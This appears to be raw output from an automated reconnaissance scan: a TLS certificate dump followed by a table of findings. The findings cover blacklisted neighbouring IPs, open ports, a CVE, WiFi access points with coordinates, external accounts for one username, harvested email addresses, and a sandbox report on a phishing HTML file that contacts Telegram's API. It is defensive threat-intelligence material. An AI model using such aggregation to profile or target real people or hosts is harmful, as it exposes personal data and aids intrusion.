93:71:bc:07:a7:76:0a:39:5b:e9:8a:11:59:0c:e9:
3d:9f:ef:48:1a:15:f1:b6:8d:38:c6:ac:b0:3d:55:
62:fd:ec:ca:10:f7:3e:ad:09:2b:f9:07:39:64:89:
c0:8c:df:58:83:b1:49:a3:6a:de:8d:1d:b0:68:22:
42:05:11:89:f5:28:3d:e2:a8:01:12:cb:7f:55:12:
36:97:26:ba:dd:f2:81:bc:89:38:da:02:ae:fd:90:
99:5d:a3:f5:46:95:ac:11:67:63:06:d1:ab:ad:cc:
15:5b:ae:15:c5:be:e2:e1:4a:b9:58:65:89:ff:47:
b7:6c:bd:4d:78:de:bc:99:4b:30:66:94:63:8c:10:
f1:ba:46:36:e6:f8:37:e7:a4:4a:58:f8:29:e5:40:
29:33:93:f8:de:48:92:4e:5d:bb:50:eb:49:71:90:
ef:b5:9b:2c:bf:b0:19:fb:12:45:a7:b3:2e:45:b4:
1b:cf:46:ab:19:7f:6c:7d:d1:f9:c0:87:cb:fb:3f:
0d:76:c4:c2:98:11:bd:11:fc:93:89:ac:ab:3e:87:
64:67:c1:b8:49:1c:b8:1a:ca:85:02:c8:58:c0:9e:
e2:87:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:81:de:04:94:c9:6d:bc:7e:82:9c:b7:57:2a:31:2b:2a:15:
1b:26:9d:e8:63:d8:bc:24:a9:a0:1e:f4:2d:8e:8b:77:72:e2:
45:09:7d:c4:f4:a1:67:74:5f:b1:6e:e3:d5:7b:46:58:74:af:
3c:f4:7f:f1:57:ba:e5:f5:ca:37:d7:63:02:f4:2b:f0:58:52:
65:e6:f9:34:c3:b2:87:a8:5a:9e:4d:cc:ad:de:a2:88:9a:d9:
fb:01:e4:7d:b5:a9:46:4f:bf:42:f8:a7:e0:7c:4b:26:0d:e1:
03:f1:4d:5f:48:bd:93:91:fe:01:c1:d3:33:76:7b:4d:7a:50:
63:0e:b1:b7:18:cd:30:ef:c6:05:90:d5:58:43:01:34:1c:aa:
ff:ac:8a:6d:d3:fb:4a:05:f7:40:bc:ca:04:f0:3d:5a:22:8b:
64:c2:7e:01:3e:5c:75:9a:28:80:e0:18:f5:4e:81:da:ad:98:
1b:02:b9:0a:2d:ec:15:e3:8e:9f:22:a4:7c:3a:69:7f:11:1b:
f6:07:40:ec:11:96:35:36:ea:3a:5b:21:5e:98:6b:a7:33:3f:
71:d6:80:da:db:36:8a:58:96:45:25:cb:40:f8:9f:e6:4f:1b:
19:eb:29:e3:55:cb:ac:82:21:95:75:58:e6:53:4c:36:8c:6c:
15:08:cf:81
|
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.109): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:58 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 1 | 3 | 0 | None | OpenPhish [netlify.app]
https://www.openphish.com/feed.txt | netlify.app |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | kik (Category: social)
https://ws2.kik.com/user/ayhu | ayhu |
| 2023-05-12 02:59:52 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | l@allledglobal.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'WAV-797251.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.111.153:443"\n "13.227.74.44:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5004:304:WilStaging_02"\n "Local\\SM0:5004:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3416:304:WilStaging_02"\n "Local\\SM0:3416:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "product_page.js" - Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_tracking_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\8096_1032656472\\auto_open_controller.js]- [targetUID: 00000000-00008096]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\8096_1032656472\\shopping_iframe_driver.js]- [targetUID: 00000000-00008096]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\8096_1032656472\\shoppingfre.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_checkout_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\8096_1534272233\\adblock_snippet.js]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00008096]\n "a369bab2-3926-4626-a576-669ff0c25556.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\a369bab2-3926-4626-a576-669ff0c25556.tmp]- [targetUID: 00000000-00008096]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00008096]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00008096]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n "eaa46630-4898-435c-8b79-12a101475848.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\eaa46630-4898-435c-8b79-12a101475848.tmp]- [targetUID: 00000000-00008096]\n "widevinecdm.dll.sig" has type "data"- Location: [%TEMP%\\8096_313714830\\_platform_specific\\win_x64\\widevinecdm.dll.sig]- [targetUID: 00000000-00008096]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00008096]\n "cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp]- [targetUID: 00000000-00003416]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00008096]\n "7de6d455-5aa2-4101-812b-70e599317de8.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7de6d455-5aa2-4101-812b-70e599317de8.tmp]- [targetUID: 00000000-00003416]\n "4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp]- [targetUID: 00000000-00008096]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00008096]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00008096]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00008096]\n "1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp]- [targetUID: 00000000-00008096]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00008096]\n "6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "jLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydgv\',\'s"\n Heuristic match: "api.telegram.org"\n Heuristic match: "l@allledglobal.com"\n Heuristic match: "german.l@alliedglobal.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:08:2F:54) | 50.1188, 8.6843 |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:80 | 188.114.97.0/24 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.243): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | My Passport (2.4 GHz) - 084071 (Net ID: 00:00:C0:08:40:71) | 50.1188, 8.6843 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/ayhu | ayhu |
| 2023-05-12 03:12:41 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 188.114.97.1 |
| 2023-05-12 03:00:48 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.64): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | United States | githubusercontent.com |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:80 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-fastly-request-id: 47e9025f17d9e6e936d804b3c00d7989ec4a827a | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
